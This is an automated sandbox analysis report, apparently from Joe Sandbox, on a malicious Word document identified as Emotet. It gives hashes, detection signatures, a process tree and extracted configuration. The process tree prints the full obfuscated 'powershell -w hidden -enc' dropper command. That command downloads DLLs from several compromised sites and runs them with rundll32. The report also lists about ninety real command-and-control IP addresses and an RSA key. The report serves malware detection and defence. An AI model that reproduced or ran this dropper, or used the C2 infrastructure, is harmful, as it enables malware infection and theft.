Loading ...

Play interactive tourEdit tour

Analysis Report ARCHIVOFile-20-012021.doc

Overview

General Information

Sample Name:ARCHIVOFile-20-012021.doc
Analysis ID:344894
MD5:d4829a31da294d0ee8f9f67bc1352bd2
SHA1:70601272023fd5285194c68da776708508524d50
SHA256:4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document has an unknown application name
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2652 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2564 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
      • rundll32.exe (PID: 1336 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2360 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2404 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 3032 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2244 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2380 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2372 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2564 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "51.15.7.145:80", "177.85.167.10:80", "186.177.174.163:80", "190.114.254.163:8080", "185.183.16.47:80", "149.202.72.142:7080", "181.30.61.163:443", "31.27.59.105:80", "50.28.51.143:8080", "68.183.190.199:8080", "85.214.26.7:8080", "137.74.106.111:7080", "200.75.39.254:80", "85.105.239.184:443", "190.45.24.210:80", "170.81.48.2:80", "109.101.137.162:8080", "110.39.160.38:443", "110.39.162.2:443", "91.233.197.70:80", "51.255.165.160:8080", "213.52.74.198:80", "12.162.84.2:8080", "82.208.146.142:7080", "60.93.23.51:80", "172.245.248.239:8080", "104.131.41.185:8080", "93.149.120.214:80", "81.214.253.80:443", "190.247.139.101:80", "46.105.114.137:8080", "70.32.115.157:8080", "202.134.4.210:7080", "212.71.237.140:8080", "177.23.7.151:80", "111.67.12.221:8080", "197.232.36.108:80", "190.162.232.138:80", "80.15.100.37:80", "95.76.153.115:80", "154.127.113.242:80", "188.225.32.231:7080", "5.196.35.138:7080", "211.215.18.93:8080", "46.101.58.37:8080", "82.48.39.246:80", "181.10.46.92:80", "190.251.216.100:80", "187.162.248.237:80", "191.223.36.170:80", "138.197.99.250:8080", "201.48.121.65:443", "78.206.229.130:80", "190.210.246.253:80", "68.183.170.114:8080", "87.106.46.107:8080", "122.201.23.45:443", "70.32.84.74:8080", "143.0.85.206:7080", "190.64.88.186:443", "217.13.106.14:8080", "93.146.143.191:80", "188.135.15.49:80", "178.211.45.66:8080", "138.97.60.141:7080", "81.17.93.134:80", "83.169.21.32:7080", "152.231.89.226:80", "80.249.176.206:80", "178.250.54.208:8080", "206.189.232.2:8080", "46.43.2.95:8080", "190.24.243.186:80", "105.209.235.113:8080", "62.84.75.50:80", "152.170.79.100:80", "209.236.123.42:8080", "185.94.252.27:443", "12.163.208.58:80", "152.169.22.67:80", "1.226.84.243:8080", "191.241.233.198:80", "94.176.234.118:443", "209.33.120.130:80", "45.16.226.117:443", "81.215.230.173:443", "172.104.169.32:8080", "201.185.69.28:443", "167.71.148.58:443", "192.175.111.212:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.rundll32.exe.10000000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.10000000.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                9.2.rundll32.exe.170000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.10000000.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    16.2.rundll32.exe.1d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 67 entries

                      Sigma Overview

